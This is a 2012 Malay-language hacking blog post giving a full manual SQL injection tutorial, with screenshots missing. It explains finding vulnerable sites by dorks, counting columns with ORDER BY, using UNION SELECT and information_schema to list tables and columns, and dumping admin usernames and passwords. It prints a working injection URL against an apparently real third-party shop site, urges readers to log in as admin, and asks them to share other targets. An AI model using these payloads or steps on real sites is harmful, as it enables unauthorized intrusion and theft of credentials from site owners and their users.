Friday, 10 February 2012

Manual SQL Injection FULL!





Assalamualaikum dan salam sejahtera...dalam tuto kali ini aku nk ajar korang manual sqli pulak.
Credit to aFNum My & Newbie3viLc063s Crew

jngan lupa hide ip.hehe... (tapi aku tak hide pun xD)
jom mula...

kata kunci yang perlu korang tau :

---------------------
karakter : ', - 
comments :
 /*--
---------------------



1. Cari target website guna dork.aku akan bagi link pastebin sebab bnyak sangat dork.credit to afNum.

2. Pilih salah satu web.
Contoh aku dapat ni:

3. Sekarang tu kita check vulnerable (vuln) ke tak web tu.
Cuma perlu tambah karakter 
di hujung url dan enter.

Contoh : 


Then kalau dapat error macam gambar dibawah bermakna web tu vuln!





4. MENCARI COLUMN COUNT

Sekarang kita perlu mencari jumlah column.Caranya :
tambah kan string ini dihujung url : 

+order+by+1--

atau

+order+by+1/*

Contoh target akan jadi macam ni :

Periksa secara berperingkat hingga keluar error.


Contoh error :



note : lain website lain error nya.ada yang keluar error seperti :Unknown column 'x' in 'order clause' 

Baiklah disebabkan di column no 6 kita mendapat error,
itu bermakna column no 6 tidak wujud.
Jadi kita hanya akan menggunakan column no 5 sahaja.


5. MENCARI ACCESSIBLE COLUMN

Baiklah langkah seterusnya ialah untuk mencari accessible column.kita dah tau column yang wujud hanya hingga 5.so kita akan guna sampai 5.

Caranya tambah kan string ini di hujung url :
+union+select+number,of,column--

dan tambahkan karakter di belakang nombor ID

note:
number,of,column-- = jumlah kiraan column yang wujud.bagi web target dalam tuto ini ialah 1,2,3,4,5--

Link akan menjadi macam ni :


Kita akan mendapat hasil macam ni :




Terdapat dua angka yang keluar.Itu menunjukan jumlah column yang boleh digunakan.Ini bermakna kita boleh mendapat maklumat dari column 1 dan 2!!!

6. CARA MENCARI MySQL DB Version

Sekarang masa untuk cari version MySQL DB Version.kita perlu tau sekiranya kita boleh exploit ke tak web ni.

Hanya site mysql version 5.x.x keatas sahaja yang exploitable.
Sebaliknya site yang menggunakan version 4.x.x kebawah tidak dapat di-exploit.so cari web lain :(

Caranya ialah menambah karakter berikut di column yang tersenarai di website tersebut :

version()

atau

@@version


Contoh link kita tadi akan jadi macam ni :

Hasilnya :



Wah!ianya version 5.x.x ke atas!Exploitable! jom ke langkah seterusnya...


7. MENCARI NAMA TABLE

Sekarang kita perlu cari nama table.cara nya ialah mengantikan :

version() 

kepada

table_name


dan tambahkan string berikut di hujung url :

+from+information_schema.tables--




Contoh link :


Hasil :



8. MENGELUARKAN ISI TABLE(TABLE NAME)


Sekarang masanya untuk mengeluarkan isi table(table name) website itu.caranya ialah mengantikan :


table_name


kepada 


group_concat(table_name)


dan letak string berikut di hujung url :


+from+information_schema.tables+where+table_schema=database()--



Contoh link target :


http://transbrandname4less.com/more_view.php?id=-100+union+select+group_concat(table_name),2,3,4,5+from+information_schema.tables+where+table_schema=database()--


Hasil :
isi table

Woohoo!dah tersenarai nama2 table yang bole digunakan!
Untuk web ni kita akan mengeluarkan data dari table tbl_users kerana berkemungkinan table tu mengandunggi password dan username admin.

9. MENGELUARKAN DATA TABLE(COLUMN)

sekarang kita akan mengeluarkan data dari table pulak.caranya ialah dengan mengantikan :


group_concat(table_name)


kepada


group_concat(column_name)


dan tambahkan string berikut di hujung url :

+from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin--

note : 
HasilConvertTextTableAdmin ialah hasil convert nama table kepada HEX.

-------------------------------------------------------------
Korang boleh convert secara percuma di site2 ni :
-------------------------------------------------------------

Dalam tuto ni aku convert table name tbl_users
Hasilnya : 74626c5f7573657273

Contoh link :



Hasil :


Column tersenarai!


10. MENGELUARKAN DATA COLUMN

Ok kita akan keluarkan isi dari column yang tersenarai tadi.
Caranya gantikan :

group_concat(column_name)

kepada

concat_ws(0x3a,nama column yang tersenarai)

Info :
0x3a = :

Note :
Gantikan nama column yang tersenarai kepada nama column yang korang nak keluarkan data.dalam tuto ni aku akan guna column name,password.

Contoh string :
concat_ws(0x3a,name,password)


Kemudian tambahkan string berikut di hujung url :

+from+nama table asal/admin--

note:
gantikan nama table asal/admin kepada nama asal table yang digunakan.dalam tuto ini aku menggunakan table tbl_users

contoh :
+from+tbl_users--


Contoh link :



Hasil :



Woohoo!! dah tertera username dan password admin!


11. LAST STEP! CARI ADMIN LOGIN PAGE!

Cari admin login page di salah satu site ni :

Korang juga bole guna HAVIJ untuk cari admin.
Jika ada mana2 web menarik tolong comment di bawah

Lepas dah jumpa,login!!

Sumber :

Itu saja untuk kali ini....Assalamualaikum~~

Item Reviewed: Manual SQL Injection FULL! Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com